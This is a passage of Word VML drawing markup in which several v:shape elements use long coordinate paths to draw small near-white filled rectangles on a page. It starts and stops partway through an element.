        <v:shape style="position:absolute;left:3990;top:8210;width:130;height:270" coordorigin="3990,8210" coordsize="130,270" path="m4001,8233l4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4001,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4002,8233,4003,8233,4003,8233,4003,8233,4003,8233,4003,8233,4004,8233,4004,8233,4004,8233,4004,8233,4005,8233,4005,8233,4005,8233,4006,8233,4006,8233,4006,8233,4007,8233,4007,8233,4008,8233,4008,8233,4008,8233,4009,8233,4009,8233,4010,8233,4010,8233,4011,8233,4012,8233,4012,8233,4013,8233,4014,8233,4014,8233,4015,8233,4016,8233,4016,8233,4017,8233,4018,8233,4019,8233,4020,8233,4021,8233,4021,8233,4022,8233,4023,8233,4024,8233,4025,8233,4027,8233,4028,8233,4029,8233,4030,8233,4031,8233,4032,8233,4034,8233,4035,8233,4036,8233,4037,8233,4039,8233,4040,8233,4042,8233,4043,8233,4045,8233,4046,8233,4048,8233,4050,8233,4051,8233,4053,8233,4055,8233,4056,8233,4058,8233,4060,8233,4062,8233,4064,8233,4066,8233,4068,8233,4070,8233,4072,8233,4074,8233,4077,8233,4079,8233,4081,8233,4083,8233,4086,8233,4088,8233,4091,8233,4093,8233,4096,8233,4098,8233,4101,8233,4104,8233,4107,8233,4109,8233,4112,8233,4115,8233,4118,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8233,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8234,4121,8235,4121,8235,4121,8235,4121,8235,4121,8236,4121,8236,4121,8236,4121,8236,4121,8237,4121,8237,4121,8238,4121,8238,4121,8239,4121,8239,4121,8240,4121,8240,4121,8241,4121,8241,4121,8242,4121,8243,4121,8244,4121,8244,4121,8245,4121,8246,4121,8247,4121,8248,4121,8249,4121,8250,4121,8251,4121,8252,4121,8253,4121,8254,4121,8256,4121,8257,4121,8258,4121,8260,4121,8261,4121,8263,4121,8264,4121,8266,4121,8268,4121,8269,4121,8271,4121,8273,4121,8275,4121,8277,4121,8279,4121,8281,4121,8283,4121,8285,4121,8287,4121,8290,4121,8292,4121,8294,4121,8297,4121,8300,4121,8302,4121,8305,4121,8308,4121,8311,4121,8314,4121,8317,4121,8320,4121,8323,4121,8326,4121,8329,4121,8333,4121,8336,4121,8340,4121,8344,4121,8347,4121,8351,4121,8355,4121,8359,4121,8363,4121,8367,4121,8371,4121,8376,4121,8380,4121,8385,4121,8389,4121,8394,4121,8399,4121,8403,4121,8408,4121,8413,4121,8419,4121,8424,4121,8429,4121,8435,4121,8440,4121,8446,4121,8452,4121,8457,4121,8463,4121,8469,4121,8476,4121,8482,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4121,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4120,8488,4119,8488,4119,8488,4119,8488,4119,8488,4119,8488,4118,8488,4118,8488,4118,8488,4117,8488,4117,8488,4117,8488,4117,8488,4116,8488,4116,8488,4115,8488,4115,8488,4115,8488,4114,8488,4114,8488,4113,8488,4113,8488,4112,8488,4112,8488,4111,8488,4110,8488,4110,8488,4109,8488,4109,8488,4108,8488,4107,8488,4106,8488,4106,8488,4105,8488,4104,8488,4103,8488,4102,8488,4102,8488,4101,8488,4100,8488,4099,8488,4098,8488,4097,8488,4096,8488,4094,8488,4093,8488,4092,8488,4091,8488,4090,8488,4089,8488,4087,8488,4086,8488,4085,8488,4083,8488,4082,8488,4080,8488,4079,8488,4077,8488,4076,8488,4074,8488,4073,8488,4071,8488,4069,8488,4067,8488,4066,8488,4064,8488,4062,8488,4060,8488,4058,8488,4056,8488,4054,8488,4052,8488,4050,8488,4048,8488,4045,8488,4043,8488,4041,8488,4039,8488,4036,8488,4034,8488,4031,8488,4029,8488,4026,8488,4024,8488,4021,8488,4018,8488,4016,8488,4013,8488,4010,8488,4007,8488,4004,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8488,4001,8487,4001,8487,4001,8487,4001,8487,4001,8487,4001,8486,4001,8486,4001,8486,4001,8486,4001,8485,4001,8485,4001,8485,4001,8484,4001,8484,4001,8483,4001,8483,4001,8482,4001,8482,4001,8481,4001,8481,4001,8480,4001,8479,4001,8479,4001,8478,4001,8477,4001,8476,4001,8475,4001,8474,4001,8474,4001,8473,4001,8472,4001,8470,4001,8469,4001,8468,4001,8467,4001,8466,4001,8464,4001,8463,4001,8462,4001,8460,4001,8459,4001,8457,4001,8456,4001,8454,4001,8452,4001,8450,4001,8449,4001,8447,4001,8445,4001,8443,4001,8441,4001,8439,4001,8436,4001,8434,4001,8432,4001,8429,4001,8427,4001,8424,4001,8422,4001,8419,4001,8416,4001,8414,4001,8411,4001,8408,4001,8405,4001,8402,4001,8399,4001,8395,4001,8392,4001,8389,4001,8385,4001,8382,4001,8378,4001,8374,4001,8370,4001,8367,4001,8363,4001,8358,4001,8354,4001,8350,4001,8346,4001,8341,4001,8337,4001,8332,4001,8328,4001,8323,4001,8318,4001,8313,4001,8308,4001,8303,4001,8298,4001,8292,4001,8287,4001,8281,4001,8276,4001,8270,4001,8264,4001,8258,4001,8252,4001,8246,4001,8240,4001,8233e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:8850;width:130;height:270" coordorigin="2650,8850" coordsize="130,270" path="m2665,8878l2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2665,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2666,8878,2667,8878,2667,8878,2667,8878,2667,8878,2667,8878,2667,8878,2668,8878,2668,8878,2668,8878,2668,8878,2669,8878,2669,8878,2669,8878,2670,8878,2670,8878,2670,8878,2671,8878,2671,8878,2671,8878,2672,8878,2672,8878,2673,8878,2673,8878,2674,8878,2674,8878,2675,8878,2675,8878,2676,8878,2677,8878,2677,8878,2678,8878,2679,8878,2679,8878,2680,8878,2681,8878,2682,8878,2682,8878,2683,8878,2684,8878,2685,8878,2686,8878,2687,8878,2688,8878,2689,8878,2690,8878,2691,8878,2692,8878,2693,8878,2694,8878,2695,8878,2697,8878,2698,8878,2699,8878,2700,8878,2702,8878,2703,8878,2705,8878,2706,8878,2708,8878,2709,8878,2711,8878,2712,8878,2714,8878,2716,8878,2717,8878,2719,8878,2721,8878,2723,8878,2725,8878,2726,8878,2728,8878,2730,8878,2732,8878,2734,8878,2737,8878,2739,8878,2741,8878,2743,8878,2745,8878,2748,8878,2750,8878,2753,8878,2755,8878,2758,8878,2760,8878,2763,8878,2765,8878,2768,8878,2771,8878,2774,8878,2777,8878,2779,8878,2782,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8878,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8879,2785,8880,2785,8880,2785,8880,2785,8880,2785,8880,2785,8881,2785,8881,2785,8881,2785,8881,2785,8882,2785,8882,2785,8883,2785,8883,2785,8883,2785,8884,2785,8884,2785,8885,2785,8886,2785,8886,2785,8887,2785,8887,2785,8888,2785,8889,2785,8890,2785,8891,2785,8891,2785,8892,2785,8893,2785,8894,2785,8895,2785,8896,2785,8897,2785,8899,2785,8900,2785,8901,2785,8902,2785,8904,2785,8905,2785,8907,2785,8908,2785,8910,2785,8911,2785,8913,2785,8915,2785,8916,2785,8918,2785,8920,2785,8922,2785,8924,2785,8926,2785,8928,2785,8930,2785,8933,2785,8935,2785,8937,2785,8940,2785,8942,2785,8945,2785,8948,2785,8950,2785,8953,2785,8956,2785,8959,2785,8962,2785,8965,2785,8968,2785,8971,2785,8975,2785,8978,2785,8982,2785,8985,2785,8989,2785,8993,2785,8996,2785,9000,2785,9004,2785,9008,2785,9012,2785,9017,2785,9021,2785,9025,2785,9030,2785,9034,2785,9039,2785,9044,2785,9049,2785,9054,2785,9059,2785,9064,2785,9069,2785,9075,2785,9080,2785,9086,2785,9091,2785,9097,2785,9103,2785,9109,2785,9115,2785,9121,2785,9127,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2785,9134,2784,9134,2784,9134,2784,9134,2784,9134,2784,9134,2784,9134,2783,9134,2783,9134,2783,9134,2783,9134,2783,9134,2782,9134,2782,9134,2782,9134,2781,9134,2781,9134,2781,9134,2780,9134,2780,9134,2780,9134,2779,9134,2779,9134,2778,9134,2778,9134,2778,9134,2777,9134,2776,9134,2776,9134,2775,9134,2775,9134,2774,9134,2774,9134,2773,9134,2772,9134,2772,9134,2771,9134,2770,9134,2769,9134,2768,9134,2768,9134,2767,9134,2766,9134,2765,9134,2764,9134,2763,9134,2762,9134,2761,9134,2760,9134,2759,9134,2758,9134,2757,9134,2755,9134,2754,9134,2753,9134,2752,9134,2750,9134,2749,9134,2748,9134,2746,9134,2745,9134,2743,9134,2742,9134,2740,9134,2738,9134,2737,9134,2735,9134,2733,9134,2732,9134,2730,9134,2728,9134,2726,9134,2724,9134,2722,9134,2720,9134,2718,9134,2716,9134,2714,9134,2712,9134,2710,9134,2708,9134,2705,9134,2703,9134,2701,9134,2698,9134,2696,9134,2693,9134,2691,9134,2688,9134,2685,9134,2683,9134,2680,9134,2677,9134,2674,9134,2671,9134,2668,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9134,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9133,2665,9132,2665,9132,2665,9132,2665,9132,2665,9132,2665,9131,2665,9131,2665,9131,2665,9130,2665,9130,2665,9130,2665,9129,2665,9129,2665,9128,2665,9128,2665,9127,2665,9127,2665,9126,2665,9125,2665,9125,2665,9124,2665,9123,2665,9122,2665,9122,2665,9121,2665,9120,2665,9119,2665,9118,2665,9117,2665,9116,2665,9115,2665,9114,2665,9112,2665,9111,2665,9110,2665,9108,2665,9107,2665,9106,2665,9104,2665,9103,2665,9101,2665,9099,2665,9098,2665,9096,2665,9094,2665,9092,2665,9090,2665,9088,2665,9086,2665,9084,2665,9082,2665,9079,2665,9077,2665,9075,2665,9072,2665,9070,2665,9067,2665,9064,2665,9062,2665,9059,2665,9056,2665,9053,2665,9050,2665,9047,2665,9044,2665,9041,2665,9037,2665,9034,2665,9030,2665,9027,2665,9023,2665,9020,2665,9016,2665,9012,2665,9008,2665,9004,2665,9000,2665,8995,2665,8991,2665,8987,2665,8982,2665,8978,2665,8973,2665,8968,2665,8963,2665,8958,2665,8953,2665,8948,2665,8943,2665,8938,2665,8932,2665,8927,2665,8921,2665,8915,2665,8909,2665,8903,2665,8897,2665,8891,2665,8885,2665,8878e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:8850;width:130;height:270" coordorigin="3010,8850" coordsize="130,270" path="m3026,8878l3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3026,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3027,8878,3028,8878,3028,8878,3028,8878,3028,8878,3029,8878,3029,8878,3029,8878,3029,8878,3030,8878,3030,8878,3030,8878,3031,8878,3031,8878,3032,8878,3032,8878,3032,8878,3033,8878,3033,8878,3034,8878,3034,8878,3035,8878,3036,8878,3036,8878,3037,8878,3037,8878,3038,8878,3039,8878,3039,8878,3040,8878,3041,8878,3042,8878,3043,8878,3043,8878,3044,8878,3045,8878,3046,8878,3047,8878,3048,8878,3049,8878,3050,8878,3051,8878,3052,8878,3053,8878,3054,8878,3056,8878,3057,8878,3058,8878,3059,8878,3061,8878,3062,8878,3063,8878,3065,8878,3066,8878,3068,8878,3069,8878,3071,8878,3072,8878,3074,8878,3076,8878,3077,8878,3079,8878,3081,8878,3083,8878,3085,8878,3087,8878,3089,8878,3091,8878,3093,8878,3095,8878,3097,8878,3099,8878,3101,8878,3103,8878,3106,8878,3108,8878,3110,8878,3113,8878,3115,8878,3118,8878,3120,8878,3123,8878,3126,8878,3128,8878,3131,8878,3134,8878,3137,8878,3140,8878,3143,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8878,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8879,3146,8880,3146,8880,3146,8880,3146,8880,3146,8880,3146,8881,3146,8881,3146,8881,3146,8881,3146,8882,3146,8882,3146,8883,3146,8883,3146,8883,3146,8884,3146,8884,3146,8885,3146,8886,3146,8886,3146,8887,3146,8887,3146,8888,3146,8889,3146,8890,3146,8891,3146,8891,3146,8892,3146,8893,3146,8894,3146,8895,3146,8896,3146,8897,3146,8899,3146,8900,3146,8901,3146,8902,3146,8904,3146,8905,3146,8907,3146,8908,3146,8910,3146,8911,3146,8913,3146,8915,3146,8916,3146,8918,3146,8920,3146,8922,3146,8924,3146,8926,3146,8928,3146,8930,3146,8933,3146,8935,3146,8937,3146,8940,3146,8942,3146,8945,3146,8948,3146,8950,3146,8953,3146,8956,3146,8959,3146,8962,3146,8965,3146,8968,3146,8971,3146,8975,3146,8978,3146,8982,3146,8985,3146,8989,3146,8993,3146,8996,3146,9000,3146,9004,3146,9008,3146,9012,3146,9017,3146,9021,3146,9025,3146,9030,3146,9034,3146,9039,3146,9044,3146,9049,3146,9054,3146,9059,3146,9064,3146,9069,3146,9075,3146,9080,3146,9086,3146,9091,3146,9097,3146,9103,3146,9109,3146,9115,3146,9121,3146,9127,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3146,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3145,9134,3144,9134,3144,9134,3144,9134,3144,9134,3144,9134,3144,9134,3143,9134,3143,9134,3143,9134,3143,9134,3143,9134,3142,9134,3142,9134,3142,9134,3141,9134,3141,9134,3141,9134,3140,9134,3140,9134,3140,9134,3139,9134,3139,9134,3138,9134,3138,9134,3137,9134,3137,9134,3136,9134,3136,9134,3135,9134,3134,9134,3134,9134,3133,9134,3132,9134,3132,9134,3131,9134,3130,9134,3129,9134,3129,9134,3128,9134,3127,9134,3126,9134,3125,9134,3124,9134,3123,9134,3122,9134,3121,9134,3120,9134,3119,9134,3118,9134,3117,9134,3116,9134,3114,9134,3113,9134,3112,9134,3110,9134,3109,9134,3108,9134,3106,9134,3105,9134,3103,9134,3102,9134,3100,9134,3099,9134,3097,9134,3095,9134,3094,9134,3092,9134,3090,9134,3088,9134,3086,9134,3084,9134,3083,9134,3081,9134,3079,9134,3076,9134,3074,9134,3072,9134,3070,9134,3068,9134,3065,9134,3063,9134,3061,9134,3058,9134,3056,9134,3053,9134,3051,9134,3048,9134,3045,9134,3043,9134,3040,9134,3037,9134,3034,9134,3031,9134,3029,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9134,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9133,3026,9132,3026,9132,3026,9132,3026,9132,3026,9132,3026,9131,3026,9131,3026,9131,3026,9130,3026,9130,3026,9130,3026,9129,3026,9129,3026,9128,3026,9128,3026,9127,3026,9127,3026,9126,3026,9125,3026,9125,3026,9124,3026,9123,3026,9122,3026,9122,3026,9121,3026,9120,3026,9119,3026,9118,3026,9117,3026,9116,3026,9115,3026,9114,3026,9112,3026,9111,3026,9110,3026,9108,3026,9107,3026,9106,3026,9104,3026,9103,3026,9101,3026,9099,3026,9098,3026,9096,3026,9094,3026,9092,3026,9090,3026,9088,3026,9086,3026,9084,3026,9082,3026,9079,3026,9077,3026,9075,3026,9072,3026,9070,3026,9067,3026,9064,3026,9062,3026,9059,3026,9056,3026,9053,3026,9050,3026,9047,3026,9044,3026,9041,3026,9037,3026,9034,3026,9030,3026,9027,3026,9023,3026,9020,3026,9016,3026,9012,3026,9008,3026,9004,3026,9000,3026,8995,3026,8991,3026,8987,3026,8982,3026,8978,3026,8973,3026,8968,3026,8963,3026,8958,3026,8953,3026,8948,3026,8943,3026,8938,3026,8932,3026,8927,3026,8921,3026,8915,3026,8909,3026,8903,3026,8897,3026,8891,3026,8885,3026,8878e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:420.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8410,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:8410;top:8850;width:130;height:270" coordorigin="8410,8850" coordsize="130,270" path="m8428,8878l8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8428,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8429,8878,8430,8878,8430,8878,8430,8878,8430,8878,8430,8878,8431,8878,8431,8878,8431,8878,8431,8878,8432,8878,8432,8878,8432,8878,8432,8878,8433,8878,8433,8878,8434,8878,8434,8878,8434,8878,8435,8878,8435,8878,8436,8878,8436,8878,8437,8878,8437,8878,8438,8878,8438,8878,8439,8878,8439,8878,8440,8878,8441,8878,8441,8878,8442,8878,8443,8878,8444,8878,8444,8878,8445,8878,8446,8878,8447,8878,8448,8878,8449,8878,8450,8878,8451,8878,8452,8878,8453,8878,8454,8878,8455,8878,8456,8878,8457,8878,8458,8878,8460,8878,8461,8878,8462,8878,8463,8878,8465,8878,8466,8878,8468,8878,8469,8878,8470,8878,8472,8878,8474,8878,8475,8878,8477,8878,8478,8878,8480,8878,8482,8878,8484,8878,8486,8878,8487,8878,8489,8878,8491,8878,8493,8878,8495,8878,8497,8878,8499,8878,8502,8878,8504,8878,8506,8878,8508,8878,8511,8878,8513,8878,8516,8878,8518,8878,8521,8878,8523,8878,8526,8878,8528,8878,8531,8878,8534,8878,8537,8878,8539,8878,8542,8878,8545,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8879,8548,8880,8548,8880,8548,8880,8548,8880,8548,8880,8548,8881,8548,8881,8548,8881,8548,8881,8548,8882,8548,8882,8548,8883,8548,8883,8548,8883,8548,8884,8548,8884,8548,8885,8548,8886,8548,8886,8548,8887,8548,8887,8548,8888,8548,8889,8548,8890,8548,8891,8548,8891,8548,8892,8548,8893,8548,8894,8548,8895,8548,8896,8548,8897,8548,8899,8548,8900,8548,8901,8548,8902,8548,8904,8548,8905,8548,8907,8548,8908,8548,8910,8548,8911,8548,8913,8548,8915,8548,8916,8548,8918,8548,8920,8548,8922,8548,8924,8548,8926,8548,8928,8548,8930,8548,8933,8548,8935,8548,8937,8548,8940,8548,8942,8548,8945,8548,8948,8548,8950,8548,8953,8548,8956,8548,8959,8548,8962,8548,8965,8548,8968,8548,8971,8548,8975,8548,8978,8548,8982,8548,8985,8548,8989,8548,8993,8548,8996,8548,9000,8548,9004,8548,9008,8548,9012,8548,9017,8548,9021,8548,9025,8548,9030,8548,9034,8548,9039,8548,9044,8548,9049,8548,9054,8548,9059,8548,9064,8548,9069,8548,9075,8548,9080,8548,9086,8548,9091,8548,9097,8548,9103,8548,9109,8548,9115,8548,9121,8548,9127,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8547,9134,8547,9134,8547,9134,8547,9134,8547,9134,8547,9134,8547,9134,8546,9134,8546,9134,8546,9134,8546,9134,8546,9134,8545,9134,8545,9134,8545,9134,8544,9134,8544,9134,8544,9134,8543,9134,8543,9134,8543,9134,8542,9134,8542,9134,8541,9134,8541,9134,8540,9134,8540,9134,8539,9134,8539,9134,8538,9134,8538,9134,8537,9134,8536,9134,8536,9134,8535,9134,8534,9134,8534,9134,8533,9134,8532,9134,8531,9134,8530,9134,8530,9134,8529,9134,8528,9134,8527,9134,8526,9134,8525,9134,8524,9134,8523,9134,8522,9134,8521,9134,8519,9134,8518,9134,8517,9134,8516,9134,8514,9134,8513,9134,8512,9134,8510,9134,8509,9134,8508,9134,8506,9134,8505,9134,8503,9134,8501,9134,8500,9134,8498,9134,8496,9134,8495,9134,8493,9134,8491,9134,8489,9134,8487,9134,8485,9134,8483,9134,8481,9134,8479,9134,8477,9134,8475,9134,8473,9134,8470,9134,8468,9134,8466,9134,8463,9134,8461,9134,8459,9134,8456,9134,8453,9134,8451,9134,8448,9134,8446,9134,8443,9134,8440,9134,8437,9134,8434,9134,8431,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9134,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9133,8428,9132,8428,9132,8428,9132,8428,9132,8428,9132,8428,9131,8428,9131,8428,9131,8428,9130,8428,9130,8428,9130,8428,9129,8428,9129,8428,9128,8428,9128,8428,9127,8428,9127,8428,9126,8428,9125,8428,9125,8428,9124,8428,9123,8428,9122,8428,9122,8428,9121,8428,9120,8428,9119,8428,9118,8428,9117,8428,9116,8428,9115,8428,9114,8428,9112,8428,9111,8428,9110,8428,9108,8428,9107,8428,9106,8428,9104,8428,9103,8428,9101,8428,9099,8428,9098,8428,9096,8428,9094,8428,9092,8428,9090,8428,9088,8428,9086,8428,9084,8428,9082,8428,9079,8428,9077,8428,9075,8428,9072,8428,9070,8428,9067,8428,9064,8428,9062,8428,9059,8428,9056,8428,9053,8428,9050,8428,9047,8428,9044,8428,9041,8428,9037,8428,9034,8428,9030,8428,9027,8428,9023,8428,9020,8428,9016,8428,9012,8428,9008,8428,9004,8428,9000,8428,8995,8428,8991,8428,8987,8428,8982,8428,8978,8428,8973,8428,8968,8428,8963,8428,8958,8428,8953,8428,8948,8428,8943,8428,8938,8428,8932,8428,8927,8428,8921,8428,8915,8428,8909,8428,8903,8428,8897,8428,8891,8428,8885,8428,8878e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:426.500pt;margin-top:442.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8530,8850" coordsize="130,270">
        <v:shape style="position:absolute;left:8530;top:8850;width:130;height:270" coordorigin="8530,8850" coordsize="130,270" path="m8548,8878l8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8548,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8549,8878,8550,8878,8550,8878,8550,8878,8550,8878,8550,8878,8550,8878,8551,8878,8551,8878,8551,8878,8551,8878,8552,8878,8552,8878,8552,8878,8553,8878,8553,8878,8553,8878,8554,8878,8554,8878,8554,8878,8555,8878,8555,8878,8556,8878,8556,8878,8557,8878,8557,8878,8558,8878,8558,8878,8559,8878,8560,8878,8560,8878,8561,8878,8561,8878,8562,8878,8563,8878,8564,8878,8564,8878,8565,8878,8566,8878,8567,8878,8568,8878,8569,8878,8570,8878,8571,8878,8572,8878,8573,8878,8574,8878,8575,8878,8576,8878,8577,8878,8578,8878,8580,8878,8581,8878,8582,8878,8583,8878,8585,8878,8586,8878,8588,8878,8589,8878,8591,8878,8592,8878,8594,8878,8595,8878,8597,8878,8599,8878,8600,8878,8602,8878,8604,8878,8606,8878,8607,8878,8609,8878,8611,8878,8613,8878,8615,8878,8617,8878,8620,8878,8622,8878,8624,8878,8626,8878,8628,8878,8631,8878,8633,8878,8636,8878,8638,8878,8641,8878,8643,8878,8646,8878,8648,8878,8651,8878,8654,8878,8657,8878,8660,8878,8662,8878,8665,8878,8668,8878,8668,8878,8668,8878,8668,8878,8668,8878,8668,8878,8668,8878,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8879,8668,8880,8668,8880,8668,8880,8668,8880,8668,8880,8668,8881,8668,8881,8668,8881,8668,8881,8668,8882,8668,8882,8668,8883,8668,8883,8668,8883,8668,8884,8668,8884,8668,8885,8668,8886,8668,8886,8668,8887,8668,8887,8668,8888,8668,8889,8668,8890,8668,8891,8668,8891,8668,8892,8668,8893,8668,8894,8668,8895,8668,8896,8668,8897,8668,8899,8668,8900,8668,8901,8668,8902,8668,8904,8668,8905,8668,8907,8668,8908,8668,8910,8668,8911,8668,8913,8668,8915,8668,8916,8668,8918,8668,8920,8668,8922,8668,8924,8668,8926,8668,8928,8668,8930,8668,8933,8668,8935,8668,8937,8668,8940,8668,8942,8668,8945,8668,8948,8668,8950,8668,8953,8668,8956,8668,8959,8668,8962,8668,8965,8668,8968,8668,8971,8668,8975,8668,8978,8668,8982,8668,8985,8668,8989,8668,8993,8668,8996,8668,9000,8668,9004,8668,9008,8668,9012,8668,9017,8668,9021,8668,9025,8668,9030,8668,9034,8668,9039,8668,9044,8668,9049,8668,9054,8668,9059,8668,9064,8668,9069,8668,9075,8668,9080,8668,9086,8668,9091,8668,9097,8668,9103,8668,9109,8668,9115,8668,9121,8668,9127,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8668,9134,8667,9134,8667,9134,8667,9134,8667,9134,8667,9134,8667,9134,8666,9134,8666,9134,8666,9134,8666,9134,8666,9134,8665,9134,8665,9134,8665,9134,8664,9134,8664,9134,8664,9134,8663,9134,8663,9134,8663,9134,8662,9134,8662,9134,8661,9134,8661,9134,8660,9134,8660,9134,8659,9134,8659,9134,8658,9134,8658,9134,8657,9134,8657,9134,8656,9134,8655,9134,8654,9134,8654,9134,8653,9134,8652,9134,8651,9134,8651,9134,8650,9134,8649,9134,8648,9134,8647,9134,8646,9134,8645,9134,8644,9134,8643,9134,8642,9134,8641,9134,8639,9134,8638,9134,8637,9134,8636,9134,8635,9134,8633,9134,8632,9134,8631,9134,8629,9134,8628,9134,8626,9134,8625,9134,8623,9134,8621,9134,8620,9134,8618,9134,8616,9134,8615,9134,8613,9134,8611,9134,8609,9134,8607,9134,8605,9134,8603,9134,8601,9134,8599,9134,8597,9134,8595,9134,8593,9134,8591,9134,8588,9134,8586,9134,8584,9134,8581,9134,8579,9134,8576,9134,8574,9134,8571,9134,8568,9134,8566,9134,8563,9134,8560,9134,8557,9134,8554,9134,8551,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9134,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9133,8548,9132,8548,9132,8548,9132,8548,9132,8548,9132,8548,9131,8548,9131,8548,9131,8548,9130,8548,9130,8548,9130,8548,9129,8548,9129,8548,9128,8548,9128,8548,9127,8548,9127,8548,9126,8548,9125,8548,9125,8548,9124,8548,9123,8548,9122,8548,9122,8548,9121,8548,9120,8548,9119,8548,9118,8548,9117,8548,9116,8548,9115,